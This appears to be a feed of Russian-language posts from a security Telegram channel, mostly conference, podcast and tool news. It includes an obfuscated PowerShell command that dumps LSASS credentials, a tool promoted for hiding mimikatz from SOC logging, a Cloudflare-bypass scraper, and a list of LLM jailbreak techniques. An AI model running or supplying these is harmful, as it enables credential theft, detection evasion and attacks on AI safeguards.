Похек

23 April 2024 11:00

🐭 Cloudflare Bypass
#cloudflare #bypass

Утилита для прохождения проверки Cloudflare. Будет полезно для парсинга, скрапинга, для боевых скриптов, когда сайт на CF и т.д. Автор обновляет репозиторий частенько, так что наиболее вероятно, что обходы будут работать.

Проект написан на Python, а под капотом библиотека DrissionPage.

Установка:

git clone https://github.com/sarperavci/CloudflareBypassForScraping; cd CloudflareBypassForScraping; python3 -m venv venv; source venv/bin/activate; pip3 install -r requirements.txt

python3 cloudflare_bypass.py

Похек

22 April 2024 10:59

⚠️ NoArgs - инструмент анти-форензики и противодействия SOC
#antiforensic #windows

Когда blue team начинают анализировать логи, то им довольно просто определить цепочку наших действий смотря по логам и запущенным процессам. Но нашёл для вас интересную тулзу, которая скрывает аргументы запуска команд.

Как показано в гифке. Сначала мы "парализуем" текущую командную строку, далее запуск mimikatz будет более менее без палева. И если просто переименовать процесс в какой-нибудь excel.exe, то в логах будет виден только запуск Excel якобы. Понятное дело, что AV спалит очевидную нагрузку по куче факторов. Но как анти-форензика и real-time противодействие SOCу, думаю отлично будет. Как будет возможность, обязательно протестирую.

🧩 NoArgs

🌚 @poxek

Похек

20 April 2024 15:01

Kubenomicon

Это база знаний начинающего исследователя, который решил задокументировать способы атаки на Kubernetes. (Ещё есть матрица угроз от Microsoft для Kubernetes, которая ориентирована на защиту системы.)

Для многих новичков проект Kubenomicon может быть полезным, однако стоит помнить, что он все еще находится в очень сыром состоянии. Многое там еще не описано и требует доработки. Кроме того, практически все описания происходят без учета RBAC, что создает ложное представление о простоте. Очевидно, что здесь не хватает описания механизмов, которые могут противодействовать этим атакам, и почему следуя инструкциям не всегда можно достичь желаемого результата.

Ссылка на проект.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Похек

19 April 2024 15:00

Приглашаем на вторую конференцию по безопасности контейнеров «БеКон» 🥓

Дата: 5 июня 2024
Место: Москва, Loft Hall
Сайт: bekon.luntry.ru

5 июня в Москве компания Luntry проведет вторую конференцию по безопасности контейнерных сред — «БеКон».

Цель мероприятия
Конференция призвана помочь компаниям перейти на новый уровень понимания контейнерной безопасности и адаптировать современные подходы по ее обеспечению.

Прошлогодние итоги БеКон вы можете найти здесь: в обзоре.

Программа 2024
Программа «БеКона 2024» — сочная выборка актуальных докладов от ведущих компаний, использующих контейнеризацию, из различных отраслей. Выступления будут короткими, без рекламы и воды, но пропитанными многолетним практическим опытом.

Приобрести билет можно на официальном сайте конференции.

Похек

19 April 2024 12:46

Obfuscated LSASS dumper command

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;

Похек

18 April 2024 17:53

10 лет VK BugBounty
#vk_bb

Поздравляю бывшие Mail.ru Group, а ныне VK со столь знаменательной датой. Ребята начинали с H1, а сейчас являются одной из крупнейших багбаунти программ в РФ!!

Ребята огромные молодцы и я благодарен Петру, что пригласил меня на ивент)

🌚 @poxek

Похек

18 April 2024 10:27

Кайфовая футболка, оверсайз XL/XXL. Крутая полоска на футболке с головоломкой и биркой Y Security Team

Фотка стикеров в чате

Похек

17 April 2024 17:26

Yandex Security Night

Похек

17 April 2024 09:50

✅ Открыт приём заявок на третью по счету Премию «Киберпросвет»

Премия «Киберпросвет» призвана отметить компании и блогеров, принимающих активное участие в освещении актуальных вопросов кибербезопасности, распространении информации о лучших практиках и продуктах обеспечения ИБ как среди профессионального сообщества, так и среди рядовых пользователей.

➡️ Считаете, что вы и/или ваша компания относитесь к ним? Тогда изучите список номинаций, выберите подходящие и направляйте в редакцию Cyber Media заявки на участие.

Сбор заявок до 16.05
Подведение итогов 31.05

Участие в Премии бесплатное.

Похек

16 April 2024 11:17

Подкаст Just Security by Awillix. Личный бренд в ИБ
#подкаст

Помнится мне говорили, что я инфоцыган и журналюга 🐈, так вот с Ромой @package_security решили обсудить эту тему. Выводы были неоднозначные, но точно интересные и отчасти философские. А также мы поговорили про ИБ с точки зрения бизнеса. Как не понимать ничего в ИБ, но стать главным архитекторов и про всеми ненавистный любимый AI в ИБ.

📹 Youtube
💬 VK
🎵 Яндекс Музыка
🎙 Apple podcast
😻 Mave

🌚 @poxek

Похек

15 April 2024 17:49

Standoff 13 Changelog
#standoff13

➡️ Новая инфра, в виде виртуального государства S
➡️ Система кланов для Red Team
➡️ Расширены возможности для Blue team (я от себя лоббировал эту идею)

🌚 @poxek

Похек

15 April 2024 11:12

Secure Coding Cheatsheets
#appsec #dev #devsecops #red_team #blue_team #SSDLC

Статья на тему безопасной разработки. В статье автор разобрал примеры уязвимостей в коде и как их избегать.

Кому полезен материал: appsec'арям, пентестерам, devsecops'ам и разрабам естественно

Также он показывает примеры не на одном языке, а на:
➡️ C#(.Net)
➡️ PHP
➡️ Go
➡️ Python
➡️ Java
➡️ Android Java
➡️ iOS Swift

Полезно почитать всем, по факту он выбрал самые популярные технологически стеки.
Автор разобрал следующие уязвимости:
➡️ Broken Access Control (Небезопасная управление доступом)
➡️ Cryptographic Failures (Криптографические недостатки)
➡️ Injection (Инъекции)
➡️ Insecure Design (Небезопасный дизайн проектирования)
➡️ Security Misconfiguration (Небезопасная настройка чего либо)
➡️ Vulnerable and Outdated Components (Уязвимые и/или не обновленные компоненты)
➡️ Inadequate Supply Chain Security (Уязвимость в цепочке поставок)
➡️ Insecure Authentication/Authorization (Небезопасная аутентификация/авторизация)
➡️ Insufficient Input/Output Validation (Недостаточная фильтрация ввода/вывода)
➡️ Insecure Communication (Небезопасная передача информации)
➡️ Improper Credential Usage (Неправильное хранение учетных данных)
➡️ Inadequate Privacy Controls (Неправильный контроль конфиденциальности)

Каждый найдет для себя что-то)

➡️ Статеечка

🌚 @poxek

Похек

14 April 2024 12:32

Разбор RCE в Telegram
#telegram #RCE

Особо говорить не чего, разраб не так две буквы написал и получилась RCE ¯⁠\⁠_⁠(⁠ツ⁠)⁠_⁠/⁠¯

➡️ Читать далее

🌚 @poxek

Похек

12 April 2024 17:52

Очень ламповый митап и приватка для багхантеров от BIZONE. Собрались сотни, а может даже тысячи багхантеров с одной лишь целью, захантить промокоды в ***)) шучу, хантишь выплаты, а если вдруг не хватит выплаты на еду, то ещё и промик на 5к дадут 😁

Похек

12 April 2024 11:02

Пентестеры / хакеры - пчелки, то ловушки - это....
#k8s #kubernetes #honeypot #идеи

Недавно с другом обсуждали идеи и одна из идей была создание своего honeypot'а. Я на них смотрю с точки зрения ресерчей и TI (threat intelligence), как пример получение сплойтов и PoC трендовых вулн. Знакомый заинтересован в этом с точки зрения thread deception. Провёл для поста маленький ресерч. В РФ такую услугу (публично) оказывает только 1 вендор. Вне РФ из популярных Checkpoint и Fortinet. Но он добавил, что Threat Deception лучше комбинировать с SOC. Потому что ловушки нужно ставить не только на внешнем периметре, но и на внутреннем контуре. И данный класс решений, даже если сделанный на коленки может превентивно оповестить вас о таргетированной атаке или поможет обнаружить 0day.

Сейчас в определенном смысле подрастя и общаясь с вендорами напрямую на конференциях, чётче и в масштабе виден рынок ИБ. И насколько хватает мировоззрения, я и не только вижу то, что почему-то honeypot'ы пропали. Раньше их можно было встретить гораздо чаще. Сейчас даг бог у крупной компании найдется сервер с port spoofing'ом (это такая настройка firewall'а, при которой при сканировании или по дефолту, сервис port spoof будет эмулировать состояние порта. Показывая к примеру, что открыты все 65535 портов и при этом отдавая сканеру каждый раз новые сервисы). Использование последнего кстати сильно подпортит жизнь атакующим. Т.к. использование общедоступных сканеров станет невозможным и придётся искать малопопулярные решения или писать своё с низкими рейтами. Этот кейс мы кстати обсуждали на безопасной среде от КОД ИБ, там вместе с Лукой, Вадимом Шелестом и Сергеем Рысиным обсуждали такие моменты ИБэшные. Всё жду, когда выпустят и прикреплю ссылку сюда)

Так я подвёл разговор на тему Threat Deception. Не как к одной штучке, которую вы развернули где-то на внем сервере в докере. А как полноценное решение для крупных компаний. Тут могла быть реклама, но её нет) Говоря про ханипоты важно уточнить, что есть два вида. Первый - это так скажем тупой, простой, легко детектируемый. Т.е. когда просто эмулируете ответ от сервера, где отдаёте к примеру старую версию ProFTPD и баннер от него. И ждать по принципу, что боты схавают такое. А есть умнные, глубокие ханипоты. Когда вы разворачиваете полноценно уязвимый сервис и вставляете к примеру в него canary, тем самым дойди до определенного эндпоинта хакер сам себя спалит.

Но что можно предложить компаниям с уже хорошей ИБ? Давайте представим образ компании с продвинутый ИБ. Наверняка у них есть SOC, вероятно инхаус пентестеры/red team и возможно они уже пересели на k8s с AD. Тогда им нужно предложить решение, которое удобно будет интегрировать с k8s.

Думаю контекста вам уже достаточно, поэтому предлагаю всем заинтересовавшимся почитать статьи Building honeypots with vcluster and Falco, первую и вторую части)

P.S. надеюсь такое направление постов вам тоже зайдет, оно занимает довольно много времени. А также если вы заинтересованы в написании таких штук, то вероятно вы найдете единомышленников в чате или у меня в ЛС)

А ещё ради интереса напишите в чат, кто какой мёд любит :)

🌚 @poxek

Похек

22 April 2024 20:12

👩‍💻 Attacking NodeJS Application.

- Use flat Promise chains;
- Set request size limits;
- Do not block the event loop;
- Perform input validation;
- Perform output escaping;
- Perform application activity logging;
- Monitor the event loop;
- Take precautions against brute-forcing;
- Use Anti-CSRF tokens;
- Prevent HTTP Parameter Pollution;
- Do not use dangerous functions;
- Use appropriate security headers;
- Listen to errors when using EventEmitter;
- Set cookie flags appropriately;
- Avoid eval(), setTimeout(), and setInterval();
- Avoid new Function();
- Avoid code serialization in JavaScript;
- Use a Node.js security linter;
- References.

#devsecops

Похек

21 April 2024 10:14

Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентификацией без знания его пароля.
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️

Синие команды уже настраивают детекты на странный sname в AS-REQ?

Похек

20 April 2024 14:52

Недавно обсуждали, что мало молодых ребят, кто уже бы багхантил, что-то где-то выигрывал. Я назвал сразу несколько имён, но ситуация однозначна. Ребята, кто в 15 уже могут похекать госуслуги или Тинькофф, это уникумы.

А я лично стараюсь, чтобы таких ребят становилось больше и больше.

Поетому данный пост посвящается Ильдару @sypso. Он выиграл ВСОШ, Всероссийская олимпиада школьников. Я смотрел эфир, примерно понимаю какие там были проекты. Из такого, ребята переизобретали badusb, ещё какие-то штуки. Но вот лично для себя концептуально новых идей не видел. А Ильдар сделал настолько крутой проект, что он может пригодится и для red team, и для malw аналитиков, и для всех интересующихся питоном.

Так что, официально, поздравляю Ильдара с его заслуженной ПОБЕДОЙ на ВСОШ. Красавчик, личный респект от меня! 😎❤️

Я надеюсь данная история замотивирует не только его двигаться дальше, но и других молодых ребят. Ведь вы наши будущее, а мы поможем вам развиться и избежать наших ошибок)

🌚 @poxek

Похек

19 April 2024 13:54

От @wearetyomsmnv

#meme

Похек

18 April 2024 21:01

Багхантерский афтерпати
#vk_bb

Похек

18 April 2024 17:16

https://github.com/prompt-security/ps-fuzz

Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:

Это список атак, которые он пытается реализовать:

Jailbreak:

AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion

Prompt Injection:

Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack

System prompt extraction:

System Prompt Stealer

Похек

17 April 2024 22:41

Yandex Welcome pack Security Night
#yandex

🌚 @poxek

Похек

17 April 2024 09:50

В прошлом году победил в одной из номинаций. В этот раз тоже буду участвовать, но в другой номинации

Похек

16 April 2024 15:02

КАК ВЗЛОМАТЬ КОМПАНИЮ? // ПРОЕКТ ПО ФИЗИЧЕСКОЙ КИБЕРАТАКЕ

Есть у меня хороший знакомый, Егор Зайцев @r00t_owl. Статный мужчина, так ещё и Директор департамента противодействия киберугрозам в «Информзащите». До знакомства с ним у меня было спорное отношение к Информзащите. Но узнав, что у них есть настолько крутой отдел red team'а и противодействия киберугрозам. Впервые мы с ним познакомились на Awillix Pentest Award, который кстати пройдет в этом году тоже и будет расширен.

Одну из историй, которую он рассказывал на своём канале, про то, как они с bodycam проводили red team и заказчик в записи потом смотрел фильм, про то как их же ломали. Там куча историй, как они проникали на казалось бы защищенный объекты, похекали АСУТП и т.д. Тот самый романтизм ИБ, только в профессиональном измерении) Максимально рекомендую зайти почитать и заодно подписаться 🐈

Так в итоге, мы шутили про фильм, шутили и вот дошутились))
Ребята буквально сняли нарезку того, как у них проходит реальный проект

📹 https://www.youtube.com/watch?v=1N5WyC1qwtI 📹

➡️ Подписывайтесь! @pro_pentest

🌚 @poxek

Похек

15 April 2024 17:50

Что случилось с Codeby? Они сделали ренейминг в DreamTeam. Так что не теряйтесь)

Codeby = DreamTeam

p.s. почему? зачем? не знаю

🌚 @poxek

Похек

15 April 2024 17:38

STANDOFF 13
#standoff13

Главная кибербитва страны, которую нельзя пропустить

Дата: 22–25 МАЯ 2024

Место: Москва, «ЛУЖНИКИ»

Какие красные команды будут на Standoff 13

⭐️По результатам Standoff 12

1 - DreamTeam
2 - True0xA3
3 - RHTxF13xSHD
4 - Cult
5 - Jet_infosystems
6 - Wetox
7 - DeteAct x SPbCTF
8 - TSARKA
9 - Kibers
10 - GISCYBERTEAM
11 - EvilBunnyWrote

1 - cR4.sh
2 - only_f4st
3 - Radiant0x2A
4 - 5HM3L
5 - MG.RT
6 - Data
7 - Crypto Apes
8 - Wardagen
9 - SecWare
13 - Baguette2Pain
14 - Invuls
17 - T.H.R.E.A.T
18 - 4ak4ak

1 - Pr1m3d
2 - Bulba_Hackers

Похек

14 April 2024 17:53

Взрывной подкаст, подкаст про bottle, подкаст про бамбуковые трусы, короче подкаст с Антоном aka @i_bo0om

Знаю, что есть те, кто не посмотрели, а те кто посмотрели могли что-то подзабыть, то советую посмотреть наш с ним подкаст ещё раз ;)
Тем более ещё лучше подписаться на канал, т.к. скоро выйдут следующие не менее крутые подкасты))

📹 Youtube
➡️ Остальные ссылки на подкаст-платформы

🌚 @poxek

Похек

12 April 2024 17:56

А ещё наш любимый Андрей Лёвкин был сегодня MC, угрожал что следующим буду я 😁❤️
Выступил шикарно ))

Похек

12 April 2024 17:18

Интересная история про Bypassing Cloudflare WAF: XSS via SQL Injection
#cloudflare #WAF #XSS #SQLi #bypass

Дабы этот пост не стал очередным, что вы отправите себе в ЛС, кратко выдели в начале главные мысли:

1. При работе по анализу защищенности, будь то пентест, ред тим или бб, обязательно делайте скрины и записывайте ключевые находки сразу, пока вы сами не забыли, как поломали это.
2. Гуглить, а точнее использовать оператор after:YYYY-MM-DD. От себя добавлю, что не просто там мы, админы, делаем для вас контент. Если у вас много телеграм каналов в подписках и чатов, то обязательно используйте поиск по самой телеге. Я постоянно этим пользуюсь и порой это сильно сокращает время нахождения сплойтов или инфы о багах.
3. Комбинируйте атаки. Самый простой пример, что user enum вам поможет с Account Takeover'ом. Если у вас python стек и вы нашли XSS, то ищите SSTI и так далее.
4. Не ожидайте, что сервер всегда вам будет отвечать ошибкой или alert()'ом. Возможно вы пропустите слепые SQLi или XSS или какую-нибудь SSRF.
5. Самый главный совет от автора статьи, не блечьте. Вы ещё молодые и шутливые, а потом боком встанет ваши необдуманные и тем более если обдуманные действия. В РФ и в мире есть очень много багбаунти программ, на которых вы можете искать уязвимости)

А в целом статья про обход CF (ничего не обычного), затем раскрутка скули и xss. Как-то так)
➡️ Читать статью

🌚 @poxek

Похек

11 April 2024 15:16

Принёс вам маленькую удобную плюшку
#red_team #fileupload

При проведении пентестов, часто сталкиваемся с тем, что можно попробовать загрузить для проверки функции загрузки файлов или для content spoofing'а. Так вот один юзер тоже задался таким вопросом и таки написал тулзу, которая генерирует картинки без какого специфичного содержания.
А то заказчик может неправильно понять и обидеться на какую-то картинку

А ещё из недавно, нужно было проверить какой максимальный размер может поглотить загрузка файлов. Был архив с NvidiaRTX Chat на 35 гб. Такой большой объем не ел, а допустим на 5 или 15 гб не смог у себя файлы найти, чтобы это были не какие-то важные архивы. Так вот эта утилита может ещё и картинки любого размера генерировать)

Возможно вы и не сделаете file upload bypass, но переполнить хранилище сервера с лёгкостью, если конечно предыдущие картинки не удаляются.

Установка:

pip install git+ssh://git@github.com/sterrasec/dummy.git

# Самый простой вариант. Текст по умолчанию "dummy file"
dummy test1.jpeg

# Далее можно поиграться с текстом, чтобы заказчик точно понял, что это оставили мы
dummy -t poxek test2.png

# Далее можем поиграться с размером. Но генерация произвольного размера возможна только для png
dummy -t poxek -b 10MB test3.png